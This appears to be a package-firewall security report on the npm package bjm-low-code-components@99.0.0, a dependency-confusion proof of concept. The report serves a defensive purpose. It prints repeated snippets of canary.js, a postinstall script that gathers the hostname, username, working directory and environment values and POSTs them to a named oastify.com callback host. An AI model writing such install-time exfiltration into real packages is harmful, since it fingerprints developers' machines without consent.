---
canonical: "https://firewall.lpm.dev/npm/bjm-low-code-components/v/99.0.0"
markdown: "https://firewall.lpm.dev/npm/bjm-low-code-components/v/99.0.0.md"
package: "bjm-low-code-components"
report_status: "published"
title: "bjm-low-code-components@99.0.0 npm security report"
verdict: "malicious"
version: "99.0.0"
---

# bjm-low-code-components@99.0.0 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — External recipient receives local hostname, username, working directory, and environment-state metadata.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Data Exfiltration
- **Selected version:** 99.0.0
- **Selected version is latest:** Yes
- **Analysis source:** AI Security Review (lpm-firewall-ai)

Install-time code fingerprints the host and sends it to an external callback endpoint. This is unconsented postinstall telemetry.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Verdict:** Malicious
- **Confidence:** 98.0%
- **Started:** 2026-08-09T12:38:27.434Z
- **Finished:** 2026-08-09T12:38:52.923Z
- **Download time:** 260 ms
- **Static scan time:** 9 ms
- **AI review time:** 25220 ms
- **Total time:** 25489 ms

## Security analysis

### Published attack-surface review

- **Summary:** Install-time code fingerprints the host and sends it to an external callback endpoint. This is unconsented postinstall telemetry.

- **Trigger:** npm install / dependency installation

- **Impact:** External recipient receives local hostname, username, working directory, and environment-state metadata.

- **Evidence paths:** package.json, canary.js, index.js

- **Review source:** ai\_review

- **Reviewed:** 2026-08-09T12:38:52.923Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** postinstall host-fingerprint exfiltration over HTTP

- **Attack narrative:** On installation, npm invokes canary.js through postinstall. The script gathers local host identity and execution-context metadata, then sends it by HTTP POST to a fixed external OAST endpoint. The package description identifies this as a dependency-confusion PoC, but it still performs the callback without installer consent.

- **Rationale:** Direct source inspection confirms an install-triggered external exfiltration callback. The benign placeholder runtime export does not mitigate the postinstall behavior.

- **Files touched:** package.json, canary.js, index.js

- **Network endpoints:** 2pslbvbc3adfni1pbe9xy2b1asgj4cs1.oastify.com

### Review decision

- **Verdict:** Malicious

- **Confidence:** 98.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for:** package.json runs \`node canary.js\` on postinstall., canary.js collects hostname, username, cwd, CI and NODE\_ENV., canary.js POSTs collected data to an external OAST host during install., Manifest describes a dependency-confusion validation PoC.

- **Evidence against:** index.js only exports a placeholder object., No shell execution, file writes, or payload loading found.

## Public findings

### 1. High: Install Time Lifecycle Scripts
- **Category:** Manifest
- **Confidence:** 90.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/bjm-low-code-components@99.0.0/package.json>)

Package defines install-time lifecycle scripts.

Public source snippet (untrusted):

```json
scripts.postinstall = node canary.js
```

### 2. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 3. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 4. Medium: Environment Vars
- **Category:** Source
- **Confidence:** 75.0%

Package source references environment variables.

### 5. Critical: Credential Exfiltration
- **Category:** Source
- **Confidence:** 90.0%
- **Path:** canary.js
- **Public source:** [View source](<https://unpkg.com/bjm-low-code-components@99.0.0/canary.js>)

Source appears to send environment or credential material to an external endpoint.

Public source snippet (untrusted):

```javascript
L1: const http = require('http');
L2: const data = JSON.stringify({
L3: host: require('os').hostname(),
L4: cwd: process.cwd(),
L5: user: require('os').userInfo().username,
L6: env: { CI: process.env.CI || null, NODE_ENV: process.env.NODE_ENV || null }
L7: });
...
L13: });
L14: req.write(data);
L15: req.end();
```

### 6. High: Host Fingerprint Exfiltration
- **Category:** Source
- **Confidence:** 86.0%
- **Path:** canary.js
- **Public source:** [View source](<https://unpkg.com/bjm-low-code-components@99.0.0/canary.js>)

Source collects local host identity data and sends it to an external endpoint.

Public source snippet (untrusted):

```javascript
L1: const http = require('http');
L2: const data = JSON.stringify({
L3: host: require('os').hostname(),
L4: cwd: process.cwd(),
L5: user: require('os').userInfo().username,
L6: env: { CI: process.env.CI || null, NODE_ENV: process.env.NODE_ENV || null }
L7: });
...
L13: });
L14: req.write(data);
L15: req.end();
```

### 7. High: Sandbox Evasion Gated Capability
- **Category:** Source
- **Confidence:** 84.0%
- **Path:** canary.js
- **Public source:** [View source](<https://unpkg.com/bjm-low-code-components@99.0.0/canary.js>)

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

Public source snippet (untrusted):

```javascript
L1: const http = require('http');
L2: const data = JSON.stringify({
L3: host: require('os').hostname(),
L4: cwd: process.cwd(),
L5: user: require('os').userInfo().username,
L6: env: { CI: process.env.CI || null, NODE_ENV: process.env.NODE_ENV || null }
L7: });
...
L13: });
L14: req.write(data);
L15: req.end();
```

### 8. Critical: Trigger Reachable Dangerous Capability
- **Category:** Source
- **Confidence:** 90.0%
- **Path:** canary.js
- **Public source:** [View source](<https://unpkg.com/bjm-low-code-components@99.0.0/canary.js>)

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

Public source snippet (untrusted):

```javascript
Trigger-reachable chain: scripts.postinstall -> canary.js
L1: const http = require('http');
L2: const data = JSON.stringify({
L3: host: require('os').hostname(),
L4: cwd: process.cwd(),
L5: user: require('os').userInfo().username,
L6: env: { CI: process.env.CI || null, NODE_ENV: process.env.NODE_ENV || null }
L7: });
...
L13: });
L14: req.write(data);
L15: req.end();
```

### 9. High: Trigger Reachable Credential Exfiltration
- **Category:** Source
- **Confidence:** 94.0%
- **Path:** canary.js
- **Public source:** [View source](<https://unpkg.com/bjm-low-code-components@99.0.0/canary.js>)

A manifest entrypoint or package-local install chain reaches credential exfiltration behavior.

Public source snippet (untrusted):

```javascript
Trigger-reachable credential exfiltration chain: scripts.postinstall -> canary.js
L1: const http = require('http');
L2: const data = JSON.stringify({
L3: host: require('os').hostname(),
L4: cwd: process.cwd(),
L5: user: require('os').userInfo().username,
L6: env: { CI: process.env.CI || null, NODE_ENV: process.env.NODE_ENV || null }
L7: });
...
L13: });
L14: req.write(data);
L15: req.end();
```

### 10. High: Trigger Reachable External Post Callback
- **Category:** Source
- **Confidence:** 94.0%
- **Path:** canary.js
- **Public source:** [View source](<https://unpkg.com/bjm-low-code-components@99.0.0/canary.js>)

A manifest entrypoint or package-local install chain reaches a fixed external POST callback.

Public source snippet (untrusted):

```javascript
Trigger-reachable fixed external POST callback chain: scripts.postinstall -> canary.js
const http = require('http');
const data = JSON.stringify({
const req = http.request({
host: '[redacted].oastify.com',   // e.g. xxxxx.oast.fun
method: 'POST',
req.write(data);
```

### 11. Medium: Structural Risk Force Deep Review
- **Category:** Artifact Inventory
- **Confidence:** 100.0%

Artifact structure forces deeper review even if the static behavioral verdict is clean.

## Dependencies and install lifecycle
- **Lifecycle scripts present:** Yes
- **Published lifecycle scripts:** postinstall
- **Dependencies:** 0
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 0
- **Published dependency-graph edges:** 0

## Package metadata
- **Package:** bjm-low-code-components
- **Ecosystem:** npm
- **Version:** 99.0.0
- **License:** MIT
- **Version published:** 2026-08-09T12:36:49.601Z
- **Package first seen:** 2026-08-09T12:38:52.923Z
- **Package last seen:** 2026-08-09T12:38:52.923Z
- **Known versions:** 1
- **Latest version:** 99.0.0
- **Appeal under review:** No
- **Description:** SECURITY POC — dependency confusion validation. DO NOT INSTALL. Engagement ref: \<your-ref\>
- **Artifact files:** 3
- **Artifact unpacked size:** 868 bytes
- **Artifact signatures:** 1
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/bjm-low-code-components/v/99.0.0>)
- [OSV advisory](<https://osv.dev/vulnerability/MAL-2026-13751>)
- [PACKAGE](<https://www.npmjs.com/package/bjm-low-code-components/v/99.0.0>)
